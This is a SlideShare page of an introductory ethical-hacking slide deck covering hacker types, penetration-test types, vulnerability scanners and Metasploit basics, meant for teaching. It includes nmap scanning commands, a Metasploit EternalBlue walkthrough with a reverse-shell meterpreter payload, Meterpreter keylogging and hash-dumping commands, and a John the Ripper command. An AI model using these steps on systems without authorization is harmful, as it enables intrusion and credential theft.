SlideShare a Scribd company logo
1 of 42
What is Hacking ?
 Process to bypass the security mechanisms.
 Unauthorized use of computer and network.
 Hacking is the practice of modifying the features of a
system, in order to accomplish a goal outside of the
creator's original purpose.
 Hacking is the process of exploiting vulnerabilities to
gain unauthorized access to systems or resources.
Who are hackers ?
 Hacker is a term used by some to mean "a clever
programmer" and by others, especially those in
popular media, to mean "someone who tries to break
into computer systems."
Types of Hackers
 White Hat
 IT professional
 Administrators
 Black Hat
 Crackers
 Grey Hat
Understanding the need to hack
your own system
 Basis for Ethical Hacking.
 To catch a thief, think like a thief
Overall goals of an ethical hacker
 Hack your systems in a nondestructive fashion.
 Enumerate vulnerabilities and , if necessary, prove
to management that vulnerabilities exit and can be
exploited.
 Apply result to remove the vulnerabilities and
better secure your systems.
Vulnerability Assessment
 A vulnerability assessment is the process of defining,
identifying, classifying and prioritizing vulnerabilities
in computer systems, applications and network
infrastructures and providing the organization doing
the assessment with the necessary knowledge,
awareness and risk background to understand the
threats to its environment and react appropriately.
Vulnerability Assessment Tools
 Nexpose Community
 QualysGuard
 OpenVAS
 Nikto
 Nmap
 Nessus Professional
 Acunetix
 Netsparker
 IBM AppScan
 Burp Suite
What is Penetration Testing
 A penetration test, also known as a pen test, is a
simulated cyber attack against your network,
infrastructure, devices, computer system or any other
environment to check for exploitable vulnerabilities.
Types of Penetration Tests
 Black Box Penetration Testing
 White Box Penetration Testing
 Grey Box Penetration Testing
Black Box Penetration Testing
 In black box penetration testing, tester has no idea
about the systems that he is going to test. He is
interested to gather information about the target
network or system. For example, in this testing, a
tester only knows what should be the expected
outcome and he does not know how the outcomes
arrives. He does not examine any programming codes.
White Box Penetration Testing
 This is a comprehensive testing, as tester has been
provided with whole range of information about the
systems and/or network such as Schema, Source code,
OS details, IP address, etc. It is normally considered as
a simulation of an attack by an internal source. It is
also known as structural, glass box, clear box, and open
box testing.
 White box penetration testing examines the code
coverage and does data flow testing, path testing, loop
testing, etc.
Grey Box Penetration Testing
 In this type of testing, a tester usually provides partial
or limited information about the internal details of the
program of a system. It can be considered as an attack
by an external hacker who had gained illegitimate
access to an organization's network infrastructure
documents.
Penetration Testing Stages
Top 10 Common Vulnerabilities
 SQL Injection
 Cross Site Scripting
 Broken Authentication and Session Management
 Insecure Direct Object References
 Cross Site Request Forgery
 Security Misconfiguration
 Insecure Cryptographic Storage
 Failure to restrict URL Access
 Insufficient Transport Layer Protection
 Un-validated Redirects and Forwards
Demo Website and VMs
 https://demo.testfire.net
 http://testphp.vulnweb.com
 OWASP Mutillidae II
 Attack-defense online lab
Building Hacking Environment
 Kali Linux - http://www.kali.org/downloads/
Kali Linux
Ports Scanning With NMAP
 nmap –sS -T4 –v <target>
Foot-printing Services With NMAP
 nmap –sS –sV -T4 –v <target>
Vulnerability Scanning With NMAP
 nmap -sS -sV -p 445 -T4 -v --script smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06-
025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-
ms17-010 192.168.10.135
Web Vulnerability Scanning
 OWASP ZAP – zaproxy
Starting with Metasploit !!!
 The Metasploit project is an open-source, computer
security project which provides information about
security vulnerabilities and aids in penetration testing
and IDS signature development.
 Metasploit is an framework which is used for the
hacking of different kinds of applications, operating
systems, web applications etc.
What is metasploit ?
 Metasploit contain various exploits, payloads, modules
etc.
 Metasploit Framework is especially used by many of
the hackers to generate payloads and attack the
systems.
 As Metasploit is an open source where any one can use
it. This framework supports different operating
systems like windows, linux ,mac os x etc.
Metasploit terms
 Exploit  used to take advantage of a security flaw
within a system, network, or application.
 Payload  is code that our victim computer to
execute by the Metasploit framework.
 Module  a small piece of code that can be added to
the Metasploit framework to execute an attack.
 Shell-code  a small piece of code used as a payload.
What is a vulnerability?
 A vulnerability is a security hole in a piece of software,
hardware or operating system that provides a potential
angle to attack the system.
 A vulnerability can be as simple as weak passwords or
as complex as buffer overflows or SQL injection
vulnerabilities.
What is an exploit?
 To take advantage of a vulnerability, you often need an
exploit, a small and highly specialized computer
program whose only reason of being is to take
advantage of a specific vulnerability and to provide
access to a computer system.
 Exploits often deliver a payload to the target system to
grant the attacker access to the system.
What is a payload?
 A payload is the piece of software that lets you control
a computer system after it’s been exploited.
 The payload is typically attached to and delivered by
the exploit.
 Metasploit most popular payload is called Meterpreter,
which enables you to do all sorts of funky stuff on the
target system. For example, you can upload and
download files from the system, take screenshots, and
collect password hashes etc.
What is msfconsole ?
 MSFconsole is an all-in-one interface to most of the
features in Metasploit.
 MSFconsole can be used to launch attacks, creating
listeners, and much, much more.
 Commands :
 Show exploits
 Show payloads
 Show options
 Use exploit
Commands
 set payload
 Set LHOST
 Set RHOST
 Back
 Info
 Session
 Session –l
 Session –i 1
Meterpreter commands
 Getuid -> show uid
 Ps -> show active process
 Migrate -> command used when hacker want to
migrate his process to any administrative privileges
process.
 Hashdump -> to dump password hash.
 Screenshot -> to take screenshot of victim.
 Shell -> to enter into the victim shell.
 download C:<file name>
 upload C:<file name>
More Meterpreter commands
 keyscan_start -> start sniffing key strokes.
 keyscan_dump
 keyscan_stop
 uictl disable keyboard
 uictl enable keyboard
Demonstration - Service Exploitation
Reconnaissance
 Ports and service scan of target system
>> nmap -sS -p445 -sV -v <victim_IP>
Exploitation – ms17_010_eternalblue
>> msfconsole
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf > set payload windows/x64/meterpreter/reverse_tcp
msf5 > show options
msf5 > set RHOST <victim_IP>
Exploitation – ms17_010_eternalblue
Exploitation – ms17_010_eternalblue
Windows Password Cracking
 John the ripper
 Command : John –format=LM –wordlist= /usr/share/commix/src/txt/password_john.txt hash.txt
Introduction To Ethical Hacking
Introduction To Ethical Hacking

More Related Content

What's hot

Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGEr Vivek Rana
 
Network security
Network securityNetwork security
Network securitytoamma
 
Social Engineering Attacks & Principles
Social Engineering Attacks & PrinciplesSocial Engineering Attacks & Principles
Social Engineering Attacks & PrinciplesLearningwithRayYT
 
Social engineering attacks
Social engineering attacksSocial engineering attacks
Social engineering attacksRamiro Cid
 
Ethical hacking ppt
Ethical hacking pptEthical hacking ppt
Ethical hacking pptNitesh Dubey
 
Information Security and Ethical Hacking
Information Security and Ethical HackingInformation Security and Ethical Hacking
Information Security and Ethical HackingDivyank Jindal
 
Ethical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolschrizjohn896
 
Cybersecurity Awareness Training
Cybersecurity Awareness TrainingCybersecurity Awareness Training
Cybersecurity Awareness TrainingDave Monahan
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfslametarrokhim1
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hackingarohan6
 
Penetration Testing Execution Phases
Penetration Testing Execution Phases Penetration Testing Execution Phases
Penetration Testing Execution Phases Nasir Bhutta
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskRob Ragan
 
Hyphenet Security Awareness Training
Hyphenet Security Awareness TrainingHyphenet Security Awareness Training
Hyphenet Security Awareness TrainingJen Ruhman
 
Understanding Cyber Kill Chain and OODA loop
Understanding Cyber Kill Chain and OODA loopUnderstanding Cyber Kill Chain and OODA loop
Understanding Cyber Kill Chain and OODA loopDavid Sweigert
 
Social Engineering,social engeineering techniques,social engineering protecti...
Social Engineering,social engeineering techniques,social engineering protecti...Social Engineering,social engeineering techniques,social engineering protecti...
Social Engineering,social engeineering techniques,social engineering protecti...ABHAY PATHAK
 
Career in Ethical Hacking
Career in Ethical Hacking Career in Ethical Hacking
Career in Ethical Hacking neosphere
 

What's hot (20)

Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your Organization
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTING
 
Network security
Network securityNetwork security
Network security
 
Social Engineering Attacks & Principles
Social Engineering Attacks & PrinciplesSocial Engineering Attacks & Principles
Social Engineering Attacks & Principles
 
Social engineering attacks
Social engineering attacksSocial engineering attacks
Social engineering attacks
 
Ethical hacking ppt
Ethical hacking pptEthical hacking ppt
Ethical hacking ppt
 
Information Security and Ethical Hacking
Information Security and Ethical HackingInformation Security and Ethical Hacking
Information Security and Ethical Hacking
 
Types of cyber attacks
Types of cyber attacksTypes of cyber attacks
Types of cyber attacks
 
Ethical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and tools
 
ETHICAL HACKING
ETHICAL HACKING ETHICAL HACKING
ETHICAL HACKING
 
Cybersecurity Awareness Training
Cybersecurity Awareness TrainingCybersecurity Awareness Training
Cybersecurity Awareness Training
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdf
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Penetration Testing Execution Phases
Penetration Testing Execution Phases Penetration Testing Execution Phases
Penetration Testing Execution Phases
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
 
Hyphenet Security Awareness Training
Hyphenet Security Awareness TrainingHyphenet Security Awareness Training
Hyphenet Security Awareness Training
 
Understanding Cyber Kill Chain and OODA loop
Understanding Cyber Kill Chain and OODA loopUnderstanding Cyber Kill Chain and OODA loop
Understanding Cyber Kill Chain and OODA loop
 
Social Engineering,social engeineering techniques,social engineering protecti...
Social Engineering,social engeineering techniques,social engineering protecti...Social Engineering,social engeineering techniques,social engineering protecti...
Social Engineering,social engeineering techniques,social engineering protecti...
 
Career in Ethical Hacking
Career in Ethical Hacking Career in Ethical Hacking
Career in Ethical Hacking
 
Social Engineering
Social EngineeringSocial Engineering
Social Engineering
 

Similar to Introduction To Ethical Hacking

Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Ethical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingANURAG CHAKRABORTY
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)Wail Hassan
 
Penetration testing
Penetration testing Penetration testing
Penetration testing PTC
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
System hacking
System hackingSystem hacking
System hackingCAS
 
systemhacking-170425062200.pdf
systemhacking-170425062200.pdfsystemhacking-170425062200.pdf
systemhacking-170425062200.pdfThasnimFathima
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.pptshreyng
 
Cyber warfare introduction
Cyber warfare introductionCyber warfare introduction
Cyber warfare introductionjagadeesh katla
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET Journal
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Introduction to ethical hacking
Introduction to ethical hackingIntroduction to ethical hacking
Introduction to ethical hackingHassanAhmedShaikh1
 
ethical-hacking-guide
ethical-hacking-guideethical-hacking-guide
ethical-hacking-guideMatt Ford
 
Ethical hacking-guide-infosec
Ethical hacking-guide-infosecEthical hacking-guide-infosec
Ethical hacking-guide-infosecCMR WORLD TECH
 

Similar to Introduction To Ethical Hacking (20)

Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Ethical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration Testing
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)
 
Metasploit
MetasploitMetasploit
Metasploit
 
Penetration testing
Penetration testing Penetration testing
Penetration testing
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
System hacking
System hackingSystem hacking
System hacking
 
systemhacking-170425062200.pdf
systemhacking-170425062200.pdfsystemhacking-170425062200.pdf
systemhacking-170425062200.pdf
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
 
Cyber warfare introduction
Cyber warfare introductionCyber warfare introduction
Cyber warfare introduction
 
Basics of hacking
Basics of hackingBasics of hacking
Basics of hacking
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Introduction to ethical hacking
Introduction to ethical hackingIntroduction to ethical hacking
Introduction to ethical hacking
 
ethical-hacking-guide
ethical-hacking-guideethical-hacking-guide
ethical-hacking-guide
 
Ethical hacking-guide-infosec
Ethical hacking-guide-infosecEthical hacking-guide-infosec
Ethical hacking-guide-infosec
 

More from Raghav Bisht

OSINT - Yandex Search
OSINT - Yandex SearchOSINT - Yandex Search
OSINT - Yandex SearchRaghav Bisht
 
OSINT - Twitter Searches
OSINT - Twitter SearchesOSINT - Twitter Searches
OSINT - Twitter SearchesRaghav Bisht
 
OSINT Tool - Reconnaissance with Recon-ng
OSINT Tool - Reconnaissance with Recon-ngOSINT Tool - Reconnaissance with Recon-ng
OSINT Tool - Reconnaissance with Recon-ngRaghav Bisht
 
OSINT Tool - Reconnaissance with Maltego
OSINT Tool - Reconnaissance with MaltegoOSINT Tool - Reconnaissance with Maltego
OSINT Tool - Reconnaissance with MaltegoRaghav Bisht
 
OSINT - Linkedin Search Slides
OSINT - Linkedin Search SlidesOSINT - Linkedin Search Slides
OSINT - Linkedin Search SlidesRaghav Bisht
 
OSINT - Facebook Searches
OSINT - Facebook SearchesOSINT - Facebook Searches
OSINT - Facebook SearchesRaghav Bisht
 
Osint - Dark side of Internet
Osint - Dark side of InternetOsint - Dark side of Internet
Osint - Dark side of InternetRaghav Bisht
 
Intrusion Detection System Project Report
Intrusion Detection System Project ReportIntrusion Detection System Project Report
Intrusion Detection System Project ReportRaghav Bisht
 
Ethical Hacking (CEH) - Industrial Training Report
Ethical Hacking (CEH) - Industrial Training ReportEthical Hacking (CEH) - Industrial Training Report
Ethical Hacking (CEH) - Industrial Training ReportRaghav Bisht
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRaghav Bisht
 
Os Command Injection Attack
Os Command Injection AttackOs Command Injection Attack
Os Command Injection AttackRaghav Bisht
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingRaghav Bisht
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016Raghav Bisht
 
ccna practical notes
ccna practical notesccna practical notes
ccna practical notesRaghav Bisht
 
Hacking in shadows By - Raghav Bisht
Hacking in shadows By - Raghav BishtHacking in shadows By - Raghav Bisht
Hacking in shadows By - Raghav BishtRaghav Bisht
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Introduction To Hacking
Introduction To HackingIntroduction To Hacking
Introduction To HackingRaghav Bisht
 
Windows Registry Tips & Tricks
Windows Registry Tips & TricksWindows Registry Tips & Tricks
Windows Registry Tips & TricksRaghav Bisht
 

More from Raghav Bisht (19)

OSINT - Yandex Search
OSINT - Yandex SearchOSINT - Yandex Search
OSINT - Yandex Search
 
OSINT - Twitter Searches
OSINT - Twitter SearchesOSINT - Twitter Searches
OSINT - Twitter Searches
 
OSINT Tool - Reconnaissance with Recon-ng
OSINT Tool - Reconnaissance with Recon-ngOSINT Tool - Reconnaissance with Recon-ng
OSINT Tool - Reconnaissance with Recon-ng
 
OSINT Tool - Reconnaissance with Maltego
OSINT Tool - Reconnaissance with MaltegoOSINT Tool - Reconnaissance with Maltego
OSINT Tool - Reconnaissance with Maltego
 
OSINT - Linkedin Search Slides
OSINT - Linkedin Search SlidesOSINT - Linkedin Search Slides
OSINT - Linkedin Search Slides
 
OSINT - Facebook Searches
OSINT - Facebook SearchesOSINT - Facebook Searches
OSINT - Facebook Searches
 
Osint - Dark side of Internet
Osint - Dark side of InternetOsint - Dark side of Internet
Osint - Dark side of Internet
 
Intrusion Detection System Project Report
Intrusion Detection System Project ReportIntrusion Detection System Project Report
Intrusion Detection System Project Report
 
Ethical Hacking (CEH) - Industrial Training Report
Ethical Hacking (CEH) - Industrial Training ReportEthical Hacking (CEH) - Industrial Training Report
Ethical Hacking (CEH) - Industrial Training Report
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Os Command Injection Attack
Os Command Injection AttackOs Command Injection Attack
Os Command Injection Attack
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration Testing
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion Attacks
 
Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016
 
ccna practical notes
ccna practical notesccna practical notes
ccna practical notes
 
Hacking in shadows By - Raghav Bisht
Hacking in shadows By - Raghav BishtHacking in shadows By - Raghav Bisht
Hacking in shadows By - Raghav Bisht
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Introduction To Hacking
Introduction To HackingIntroduction To Hacking
Introduction To Hacking
 
Windows Registry Tips & Tricks
Windows Registry Tips & TricksWindows Registry Tips & Tricks
Windows Registry Tips & Tricks
 

Recently uploaded

Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...panagenda
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditSkynet Technologies
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance Audit
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 

Introduction To Ethical Hacking

  • 1.
  • 2. What is Hacking ?  Process to bypass the security mechanisms.  Unauthorized use of computer and network.  Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose.  Hacking is the process of exploiting vulnerabilities to gain unauthorized access to systems or resources.
  • 3. Who are hackers ?  Hacker is a term used by some to mean "a clever programmer" and by others, especially those in popular media, to mean "someone who tries to break into computer systems."
